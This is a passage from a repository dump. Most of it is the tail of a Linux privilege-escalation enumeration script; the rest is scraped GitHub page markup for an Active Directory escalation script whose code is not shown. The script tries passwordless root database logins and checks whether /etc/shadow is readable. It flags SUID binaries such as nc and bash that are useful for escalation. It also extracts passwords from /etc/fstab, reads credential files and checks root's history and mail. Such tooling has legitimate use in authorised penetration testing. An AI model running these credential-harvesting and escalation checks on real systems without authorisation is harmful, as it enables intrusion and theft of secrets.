[ "$outfile" ]; then 952 | if [ "$mysqlconnectnopass" ]; then 953 | echo -e "***We can connect to the local MYSQL service as 'root' and without a password!\n$mysqlconnectnopass" >> $outfile 954 | echo -e "\n" >> $outfile 955 | else 956 | : 957 | fi 958 | else 959 | if [ "$mysqlconnectnopass" ]; then 960 | echo -e "\e[00;33m***We can connect to the local MYSQL service as 'root' and without a password!\e[00m\n$mysqlconnectnopass" 961 | echo -e "\n" 962 | else 963 | : 964 | fi 965 | fi 966 | 967 | postgver=`psql -V 2>/dev/null` 968 | if [ "$outfile" ]; then 969 | if [ "$postgver" ]; then 970 | echo -e "Postgres version:\n$postgver" >> $outfile 971 | echo -e "\n" >> $outfile 972 | else 973 | : 974 | fi 975 | else 976 | if [ "$postgver" ]; then 977 | echo -e "\e[00;31mPostgres version:\e[00m\n$postgver" 978 | echo -e "\n" 979 | else 980 | : 981 | fi 982 | fi 983 | 984 | postcon1=`psql -U postgres template0 -c 'select version()' 2>/dev/null | grep version` 985 | if [ "$outfile" ]; then 986 | if [ "$postcon1" ]; then 987 | echo -e "***We can connect to Postgres DB 'template0' as user 'postgres' with no password!\n$postcon1" >> $outfile 988 | echo -e "\n" >> $outfile 989 | else 990 | : 991 | fi 992 | else 993 | if [ "$postcon1" ]; then 994 | echo -e "\e[00;33m***We can connect to Postgres DB 'template0' as user 'postgres' with no password!:\e[00m\n$postcon1" 995 | echo -e "\n" 996 | else 997 | : 998 | fi 999 | fi 1000 | 1001 | postcon11=`psql -U postgres template1 -c 'select version()' 2>/dev/null | grep version` 1002 | if [ "$outfile" ]; then 1003 | if [ "$postcon11" ]; then 1004 | echo -e "***We can connect to Postgres DB 'template1' as user 'postgres' with no password!\n$postcon11" >> $outfile 1005 | echo -e "\n" >> $outfile 1006 | else 1007 | : 1008 | fi 1009 | else 1010 | if [ "$postcon11" ]; then 1011 | echo -e "\e[00;33m***We can connect to Postgres DB 'template1' as user 'postgres' with no password!:\e[00m\n$postcon11" 1012 | echo -e "\n" 1013 | else 1014 | : 1015 | fi 1016 | fi 1017 | 1018 | postcon2=`psql -U pgsql template0 -c 'select version()' 2>/dev/null | grep version` 1019 | if [ "$outfile" ]; then 1020 | if [ "$postcon2" ]; then 1021 | echo -e "***We can connect to Postgres DB 'template0' as user 'psql' with no password!\n$postcon2" >> $outfile 1022 | echo -e "\n" >> $outfile 1023 | else 1024 | : 1025 | fi 1026 | else 1027 | if [ "$postcon2" ]; then 1028 | echo -e "\e[00;33m***We can connect to Postgres DB 'template0' as user 'psql' with no password!:\e[00m\n$postcon2" 1029 | echo -e "\n" 1030 | else 1031 | : 1032 | fi 1033 | fi 1034 | 1035 | postcon22=`psql -U pgsql template1 -c 'select version()' 2>/dev/null | grep version` 1036 | if [ "$outfile" ]; then 1037 | if [ "$postcon22" ]; then 1038 | echo -e "***We can connect to Postgres DB 'template1' as user 'psql' with no password!\n$postcon22" >> $outfile 1039 | echo -e "\n" >> $outfile 1040 | else 1041 | : 1042 | fi 1043 | else 1044 | if [ "$postcon22" ]; then 1045 | echo -e "\e[00;33m***We can connect to Postgres DB 'template1' as user 'psql' with no password!:\e[00m\n$postcon22" 1046 | echo -e "\n" 1047 | else 1048 | : 1049 | fi 1050 | fi 1051 | 1052 | apachever=`apache2 -v 2>/dev/null; httpd -v 2>/dev/null` 1053 | if [ "$outfile" ]; then 1054 | if [ "$apachever" ]; then 1055 | echo -e "Apache version:\n$apachever" >> $outfile 1056 | echo -e "\n" >> $outfile 1057 | else 1058 | : 1059 | fi 1060 | else 1061 | if [ "$apachever" ]; then 1062 | echo -e "\e[00;31mApache version:\e[00m\n$apachever" 1063 | echo -e "\n" 1064 | else 1065 | : 1066 | fi 1067 | fi 1068 | 1069 | apacheusr=`cat /etc/apache2/envvars 2>/dev/null |grep -i 'user\|group' |awk '{sub(/.*\export /,"")}1'` 1070 | if [ "$outfile" ]; then 1071 | if [ "$apacheusr" ]; then 1072 | echo -e "Apache user configuration:\n$apacheusr" >> $outfile 1073 | echo -e "\n" >> $outfile 1074 | else 1075 | : 1076 | fi 1077 | else 1078 | if [ "$apacheusr" ]; then 1079 | echo -e "\e[00;31mApache user configuration:\e[00m\n$apacheusr" 1080 | echo -e "\n" 1081 | else 1082 | : 1083 | fi 1084 | fi 1085 | 1086 | if [ "$outfile" ]; then 1087 | echo -e "### INTERESTING FILES ####################################" >> $outfile 1088 | echo -e "Useful file locations:" >> $outfile;which nc 2>/dev/null >> $outfile; which netcat 2>/dev/null >> $outfile; which wget 2>/dev/null >> $outfile; which nmap 2>/dev/null >> $outfile; which gcc 2>/dev/null >> $outfile 1089 | echo -e "\n" >> $outfile 1090 | echo -e "Can we read/write sensitive files:" >> $outfile;ls -la /etc/passwd 2>/dev/null >> $outfile; ls -la /etc/group 2>/dev/null >> $outfile; ls -la /etc/profile 2>/dev/null >> $outfile; ls -la /etc/shadow 2>/dev/null >> $outfile; ls -la /etc/master.passwd 2>/dev/null >> $outfile 1091 | echo -e "\n" >> $outfile 1092 | else 1093 | echo -e "\e[00;34m### INTERESTING FILES ####################################\e[00m" 1094 | echo -e "\e[00;31mUseful file locations:\e[00m" ;which nc 2>/dev/null; which netcat 2>/dev/null; which wget 2>/dev/null; which nmap 2>/dev/null; which gcc 2>/dev/null 1095 | echo -e "\n" 1096 | echo -e "\e[00;31mCan we read/write sensitive files:\e[00m" ;ls -la /etc/passwd 2>/dev/null; ls -la /etc/group 2>/dev/null; ls -la /etc/profile 2>/dev/null; ls -la /etc/shadow 2>/dev/null; ls -la /etc/master.passwd 2>/dev/null 1097 | echo -e "\n" 1098 | fi 1099 | 1100 | findsuid=`find / -perm -4000 -type f 2>/dev/null` 1101 | if [ "$outfile" ]; then 1102 | if [ "$findsuid" ]; then 1103 | echo -e "SUID files:\n$findsuid" >> $outfile 1104 | echo -e "\n" >> $outfile 1105 | else 1106 | : 1107 | fi 1108 | else 1109 | if [ "$findsuid" ]; then 1110 | echo -e "\e[00;31mSUID files:\e[00m\n$findsuid" 1111 | echo -e "\n" 1112 | else 1113 | : 1114 | fi 1115 | fi 1116 | 1117 | #list of 'interesting' suid files - feel free to make additions 1118 | intsuid=`find / -perm -4000 -type f 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\|'more'\|'less'\|'vi'\|'vim'\|'nc'\|'netcat'\|python\|ruby\|lua\|irb\|pl' | xargs -r ls -la` 1119 | if [ "$outfile" ]; then 1120 | if [ "$intsuid" ]; then 1121 | echo -e "***Possibly interesting SUID files:\n$intsuid" >> $outfile 1122 | echo -e "\n" >> $outfile 1123 | else 1124 | : 1125 | fi 1126 | else 1127 | if [ "$intsuid" ]; then 1128 | echo -e "\e[00;33m***Possibly interesting SUID files:\e[00m\n$intsuid" 1129 | echo -e "\n" 1130 | else 1131 | : 1132 | fi 1133 | fi 1134 | 1135 | wwsuid=`find / -perm -4007 -type f 2>/dev/null` 1136 | if [ "$outfile" ]; then 1137 | if [ "$wwsuid" ]; then 1138 | echo -e "World-writable SUID files:\n$wwsuid" >> $outfile 1139 | echo -e "\n" >> $outfile 1140 | else 1141 | : 1142 | fi 1143 | else 1144 | if [ "$wwsuid" ]; then 1145 | echo -e "\e[00;31mWorld-writable SUID files:\e[00m\n$wwsuid" 1146 | echo -e "\n" 1147 | else 1148 | : 1149 | fi 1150 | fi 1151 | 1152 | wwsuidrt=`find / -uid 0 -perm -4007 -type f 2>/dev/null` 1153 | if [ "$outfile" ]; then 1154 | if [ "$wwsuidrt" ]; then 1155 | echo -e "World-writable SUID files owned by root:\n$wwsuidrt" >> $outfile 1156 | echo -e "\n" >> $outfile 1157 | else 1158 | : 1159 | fi 1160 | else 1161 | if [ "$wwsuidrt" ]; then 1162 | echo -e "\e[00;31mWorld-writable SUID files owned by root:\e[00m\n$wwsuidrt" 1163 | echo -e "\n" 1164 | else 1165 | : 1166 | fi 1167 | fi 1168 | 1169 | findguid=`find / -perm -2000 -type f 2>/dev/null` 1170 | if [ "$outfile" ]; then 1171 | if [ "$findguid" ]; then 1172 | echo -e "GUID files:\n$findguid" >> $outfile 1173 | echo -e "\n" >> $outfile 1174 | else 1175 | : 1176 | fi 1177 | else 1178 | if [ "$findguid" ]; then 1179 | echo -e "\e[00;31mGUID files:\e[00m\n$findguid" 1180 | echo -e "\n" 1181 | else 1182 | : 1183 | fi 1184 | fi 1185 | 1186 | #list of 'interesting' guid files - feel free to make additions 1187 | intguid=`find / -perm -2000 -type f 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\|'more'\|'less'\|'vi'\|'vim'\|'nc'\|'netcat'\|python\|ruby\|lua\|irb\|pl' | xargs -r ls -la` 1188 | if [ "$outfile" ]; then 1189 | if [ "$intguid" ]; then 1190 | echo -e "***Possibly interesting GUID files:\n$intguid" >> $outfile 1191 | echo -e "\n" >> $outfile 1192 | else 1193 | : 1194 | fi 1195 | else 1196 | if [ "$intguid" ]; then 1197 | echo -e "\e[00;33m***Possibly interesting GUID files:\e[00m\n$intguid" 1198 | echo -e "\n" 1199 | else 1200 | : 1201 | fi 1202 | fi 1203 | 1204 | wwguid=`find / -perm -2007 -type f 2>/dev/null` 1205 | if [ "$outfile" ]; then 1206 | if [ "$wwguid" ]; then 1207 | echo -e "World-writable GUID files:\n$wwguid" >> $outfile 1208 | echo -e "\n" >> $outfile 1209 | else 1210 | : 1211 | fi 1212 | else 1213 | if [ "$wwguid" ]; then 1214 | echo -e "\e[00;31mWorld-writable GUID files:\e[00m\n$wwguid" 1215 | echo -e "\n" 1216 | else 1217 | : 1218 | fi 1219 | fi 1220 | 1221 | wwguidrt=`find / -uid 0 -perm -2007 -type f 2>/dev/null` 1222 | if [ "$outfile" ]; then 1223 | if [ "$wwguidrt" ]; then 1224 | echo -e "World-writable GUID files owned by root:\n$wwguidrt" >> $outfile 1225 | echo -e "\n" >> $outfile 1226 | else 1227 | : 1228 | fi 1229 | else 1230 | if [ "$wwguidrt" ]; then 1231 | echo -e "\e[00;31mAWorld-writable GUID files owned by root:\e[00m\n$wwguidrt" 1232 | echo -e "\n" 1233 | else 1234 | : 1235 | fi 1236 | fi 1237 | 1238 | #list all world-writable files excluding /proc 1239 | wwfiles=`find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null` 1240 | if [ "$outfile" ]; then 1241 | if [ "$wwfiles" ]; then 1242 | echo -e "World-writable files (excluding /proc):\n$wwfiles" >> $outfile 1243 | echo -e "\n" >> $outfile 1244 | else 1245 | : 1246 | fi 1247 | else 1248 | if [ "$wwfiles" ]; then 1249 | echo -e "\e[00;31mWorld-writable files (excluding /proc):\e[00m\n$wwfiles" 1250 | echo -e "\n" 1251 | else 1252 | : 1253 | fi 1254 | fi 1255 | 1256 | usrplan=`find /home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;` 1257 | if [ "$outfile" ]; then 1258 | if [ "$usrplan" ]; then 1259 | echo -e "Plan file permissions and contents:\n$usrplan" >> $outfile 1260 | echo -e "\n" >> $outfile 1261 | else 1262 | : 1263 | fi 1264 | else 1265 | if [ "$usrplan" ]; then 1266 | echo -e "\e[00;31mPlan file permissions and contents:\e[00m\n$usrplan" 1267 | echo -e "\n" 1268 | else 1269 | : 1270 | fi 1271 | fi 1272 | 1273 | bsdusrplan=`find /usr/home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;` 1274 | if [ "$outfile" ]; then 1275 | if [ "$bsdusrplan" ]; then 1276 | echo -e "Plan file permissions and contents:\n$bsdusrplan" >> $outfile 1277 | echo -e "\n" >> $outfile 1278 | else 1279 | : 1280 | fi 1281 | else 1282 | if [ "$bsdusrplan" ]; then 1283 | echo -e "\e[00;31mPlan file permissions and contents:\e[00m\n$bsdusrplan" 1284 | echo -e "\n" 1285 | else 1286 | : 1287 | fi 1288 | fi 1289 | rhostsusr=`find /home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;` 1290 | if [ "$outfile" ]; then 1291 | if [ "$rhostsusr" ]; then 1292 | echo -e "rhost config file(s) and file contents:\n$rhostsusr" >> $outfile 1293 | echo -e "\n" >> $outfile 1294 | else 1295 | : 1296 | fi 1297 | else 1298 | if [ "$rhostsusr" ]; then 1299 | echo -e "\e[00;31mrhost config file(s) and file contents:\e[00m\n$rhostsusr" 1300 | echo -e "\n" 1301 | else 1302 | : 1303 | fi 1304 | fi 1305 | 1306 | bsdrhostsusr=`find /usr/home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;` 1307 | if [ "$outfile" ]; then 1308 | if [ "$bsdrhostsusr" ]; then 1309 | echo -e "rhost config file(s) and file contents:\n$bsdrhostsusr" >> $outfile 1310 | echo -e "\n" >> $outfile 1311 | else 1312 | : 1313 | fi 1314 | else 1315 | if [ "$bsdrhostsusr" ]; then 1316 | echo -e "\e[00;31mrhost config file(s) and file contents:\e[00m\n$bsdrhostsusr" 1317 | echo -e "\n" 1318 | else 1319 | : 1320 | fi 1321 | fi 1322 | 1323 | rhostssys=`find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;` 1324 | if [ "$outfile" ]; then 1325 | if [ "$rhostssys" ]; then 1326 | echo -e "Hosts.equiv file details and file contents:\n$rhostssys" >> $outfile 1327 | echo -e "\n" >> $outfile 1328 | else 1329 | : 1330 | fi 1331 | else 1332 | if [ "$rhostssys" ]; then 1333 | echo -e "\e[00;31mHosts.equiv file details and file contents: \e[00m\n$rhostssys" 1334 | echo -e "\n" 1335 | else 1336 | : 1337 | fi 1338 | fi 1339 | 1340 | nfsexports=`ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null` 1341 | if [ "$outfile" ]; then 1342 | if [ "$nfsexports" ]; then 1343 | echo -e "NFS config details:\n$nfsexports" >> $outfile 1344 | echo -e "\n" >> $outfile 1345 | else 1346 | : 1347 | fi 1348 | else 1349 | if [ "$nfsexports" ]; then 1350 | echo -e "\e[00;31mNFS config details: \e[00m\n$nfsexports" 1351 | echo -e "\n" 1352 | else 1353 | : 1354 | fi 1355 | fi 1356 | 1357 | fstab=`cat /etc/fstab 2>/dev/null |grep username |awk '{sub(/.*\username=/,"");sub(/\,.*/,"")}1'| xargs -r echo username:; cat /etc/fstab 2>/dev/null |grep password |awk '{sub(/.*\password=/,"");sub(/\,.*/,"")}1'| xargs -r echo password:; cat /etc/fstab 2>/dev/null |grep domain |awk '{sub(/.*\domain=/,"");sub(/\,.*/,"")}1'| xargs -r echo domain:` 1358 | if [ "$outfile" ]; then 1359 | if [ "$fstab" ]; then 1360 | echo -e "***Looks like there are credentials in /etc/fstab!\n$fstab" >> $outfile 1361 | echo -e "\n" >> $outfile 1362 | else 1363 | : 1364 | fi 1365 | else 1366 | if [ "$fstab" ]; then 1367 | echo -e "\e[00;33m***Looks like there are credentials in /etc/fstab!\e[00m\n$fstab" 1368 | echo -e "\n" 1369 | else 1370 | : 1371 | fi 1372 | fi 1373 | 1374 | fstabcred=`cat /etc/fstab 2>/dev/null |grep cred |awk '{sub(/.*\credentials=/,"");sub(/\,.*/,"")}1'| xargs -I{} sh -c 'ls -la {}; cat {}'` 1375 | if [ "$outfile" ]; then 1376 | if [ "$fstabcred" ]; then 1377 | echo -e "***/etc/fstab contains a credentials file!\n$fstabcred" >> $outfile 1378 | echo -e "\n" >> $outfile 1379 | else 1380 | : 1381 | fi 1382 | else 1383 | if [ "$fstabcred" ]; then 1384 | echo -e "\e[00;33m***/etc/fstab contains a credentials file!\e[00m\n$fstabcred" 1385 | echo -e "\n" 1386 | else 1387 | : 1388 | fi 1389 | fi 1390 | 1391 | #Search function for optimising searches and to support multiple keywords 1392 | function searches(){ 1393 | #keyword that will be searched 1394 | searchme=$1 1395 | #file type that will be searched (*.conf, *.log, etc.) 1396 | searchfile=$2 1397 | #depth for search 1398 | depth=$3 1399 | if [ "$outfile" ]; then 1400 | if [ "$searchme" = "" ]; then 1401 | echo -e "Can't search $searchfile files as no keyword was entered\n" >> $outfile 1402 | else 1403 | searchkey=`find / -maxdepth $depth -name $searchfile -type f -exec grep -Hn $searchme {} \; 2>/dev/null` 1404 | if [ "$searchkey" ]; then 1405 | echo -e "Search keyword(s) ($searchme) (recursive $depth levels - output format filepath:identified line number where keyword appears):\n$searchkey" >> $outfile 1406 | echo -e "\n" >> $outfile 1407 | else 1408 | echo -e "Search keyword(s) ($keyword) (recursive 4 levels):" >> $outfile 1409 | echo -e "'$searchme' not found in any $searchfile files" >> $outfile 1410 | echo -e "\n" >> $outfile 1411 | fi 1412 | fi 1413 | else 1414 | if [ "$searchme" = "" ]; then 1415 | echo -e "Can't search $searchfile files as no keyword was entered\n" 1416 | else 1417 | searchkey=`find / -maxdepth $depth -name $searchfile -type f -exec grep -Hn $searchme {} \; 2>/dev/null` 1418 | if [ "$searchkey" ]; then 1419 | echo -e "\e[00;32mSearch keyword(s) ($searchme) (recursive $depth levels - output format filepath:identified line number where keyword appears):\e[00m\n$searchkey" 1420 | echo -e "\n" 1421 | else 1422 | echo -e "\e[00;31mSearch keyword(s) ($keyword) (recursive 4 levels):\e[00m" 1423 | echo -e "'$searchme' not found in any $searchfile files" 1424 | echo -e "\n" 1425 | fi 1426 | fi 1427 | fi 1428 | } 1429 | 1430 | IFS=' ' read -a all_keywords <<< "${keyword}" 1431 | 1432 | 1433 | #use supplied keyword/s and selected file types for potentional matches - output will show line number within relevant file path where a match has been located 1434 | for words in "${all_keywords[@]}" 1435 | do 1436 | #call search function with arguments keyword, file extension (*.extension) and depth 1437 | searches "$words" *.conf 4 1438 | searches "$words" *.log 2 1439 | searches "$words" *.ini 2 1440 | done 1441 | 1442 | allconf=`find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} \; 2>/dev/null` 1443 | if [ "$outfile" ]; then 1444 | if [ "$allconf" ]; then 1445 | echo -e "All *.conf files in /etc (recursive 1 level):\n$allconf" >> $outfile 1446 | echo -e "\n" >> $outfile 1447 | else 1448 | : 1449 | fi 1450 | else 1451 | if [ "$allconf" ]; then 1452 | echo -e "\e[00;31mAll *.conf files in /etc (recursive 1 level):\e[00m\n$allconf" 1453 | echo -e "\n" 1454 | else 1455 | : 1456 | fi 1457 | fi 1458 | 1459 | usrhist=`ls -la ~/.*_history 2>/dev/null` 1460 | if [ "$outfile" ]; then 1461 | if [ "$usrhist" ]; then 1462 | echo -e "Current user's history files:\n$usrhist" >> $outfile 1463 | echo -e "\n" >> $outfile 1464 | else 1465 | : 1466 | fi 1467 | else 1468 | if [ "$usrhist" ]; then 1469 | echo -e "\e[00;31mCurrent user's history files:\e[00m\n$usrhist" 1470 | echo -e "\n" 1471 | else 1472 | : 1473 | fi 1474 | fi 1475 | 1476 | roothist=`ls -la /root/.*_history 2>/dev/null` 1477 | if [ "$outfile" ]; then 1478 | if [ "$roothist" ]; then 1479 | echo -e "***Root's history files are accessible!\n$roothist" >> $outfile 1480 | echo -e "\n" >> $outfile 1481 | else 1482 | : 1483 | fi 1484 | else 1485 | if [ "$roothist" ]; then 1486 | echo -e "\e[00;33m***Root's history files are accessible!\e[00m\n$roothist" 1487 | echo -e "\n" 1488 | else 1489 | : 1490 | fi 1491 | fi 1492 | 1493 | readmail=`ls -la /var/mail 2>/dev/null` 1494 | if [ "$outfile" ]; then 1495 | if [ "$readmail" ]; then 1496 | echo -e "Any interesting mail in /var/mail:\n$readmail" >> $outfile 1497 | echo -e "\n" >> $outfile 1498 | else 1499 | : 1500 | fi 1501 | else 1502 | if [ "$readmail" ]; then 1503 | echo -e "\e[00;31mAny interesting mail in /var/mail:\e[00m\n$readmail" 1504 | echo -e "\n" 1505 | else 1506 | : 1507 | fi 1508 | fi 1509 | 1510 | readmailroot=`head /var/mail/root 2>/dev/null` 1511 | if [ "$outfile" ]; then 1512 | if [ "$readmailroot" ]; then 1513 | echo -e "***We can read /var/mail/root! (snippet below)\n$readmailroot" >> $outfile 1514 | echo -e "\n" >> $outfile 1515 | else 1516 | : 1517 | fi 1518 | else 1519 | if [ "$readmailroot" ]; then 1520 | echo -e "\e[00;33m***We can read /var/mail/root! (snippet below)\e[00m\n$readmailroot" 1521 | echo -e "\n" 1522 | else 1523 | : 1524 | fi 1525 | fi 1526 | 1527 | if [ "$outfile" ]; then 1528 | echo -e "### SCAN COMPLETE ####################################" >> $outfile 1529 | else 1530 | echo -e "\e[00;30m### SCAN COMPLETE ####################################\e[00m" 1531 | fi 1532 | -------------------------------------------------------------------------------- /ADAPE.ps1: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | ADAPE-Script/ADAPE.ps1 at master · hausec/ADAPE-Script · GitHub 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 |
113 | Skip to content 114 |
115 | 116 | 117 | 118 | 119 | 120 | 121 | 391 | 392 |
393 | 394 |
395 | 396 | 397 |
398 | 399 |
400 | 401 | 402 | 403 |
404 |
405 |
406 | 407 | 408 | 409 | 410 | 411 | 412 | 413 | 414 | 415 | 416 |
417 |
418 | 419 | 458 | 459 |

460 | 461 | /ADAPE-Script 464 | 465 | 466 |

467 | 468 |
469 | 470 | 514 | 515 | 516 |
517 |
518 |
519 | 520 | 521 | 522 | 523 | 524 | 525 | 526 | Permalink 527 | 528 | 529 | 542 | 543 | 544 |
545 | 546 | 547 |
548 | 552 | Branch: 553 | master 554 | 555 | 556 | 557 | 558 | 559 | 560 | 561 |
562 | 563 |
564 | 568 | Find file 569 | 570 | 571 | Copy path 572 | 573 |
574 | 575 |

576 | ADAPE-Script/ADAPE.ps1 577 |

578 | 579 |
580 | 584 | Find file 585 | 586 | 587 | Copy path 588 | 589 |
590 |
591 | 592 | 593 | 594 | 595 |
596 |
597 | 598 | 599 | 600 | 601 | Fixed GPPP, I think? 602 | 603 | 604 | 605 | aea49f2 606 | Mar 22, 2019 607 | 608 |
609 | 610 |
611 |
612 | 613 | 2 contributors 614 | 615 | 619 |
620 | 623 |

624 | Users who have contributed to this file 625 |

626 |
627 | 639 | 640 | 641 |
642 | 643 | 644 | @hausec 645 | 646 | @the-rileyj 647 | 648 | 649 | 650 |
651 |
652 | 653 | 654 | 655 | 656 | 657 |
658 | 659 |
660 | 661 |
662 | 1.2 MB 663 |
664 | 665 |
666 | 667 |
668 | Download 669 | History 670 |
671 | 672 | 673 |
674 | 675 |
676 | 680 |
681 |
682 |
683 | 684 | 685 | 686 |
687 |
688 | View raw 689 |

(Sorry about that, but we can’t show files that are this big right now.)

690 |
691 |
692 | 693 |
694 | 695 | 696 | 697 |
698 | 699 | 700 |
701 | 702 | 703 |
704 |
705 | 706 | 707 | 708 |
709 |
710 |
711 | 712 |
713 |
714 | 715 | 716 |
717 | 718 | 719 | 747 | 748 | 749 | 750 |
751 | 752 | 755 | You can’t perform that action at this time. 756 |
757 | 758 | 759 | 760 | 761 | 762 | 763 | 764 | 765 | 766 | 772 | 783 | 784 | 788 | 789 |
790 | 791 | 792 | 793 | 794 | --------------------------------------------------------------------------------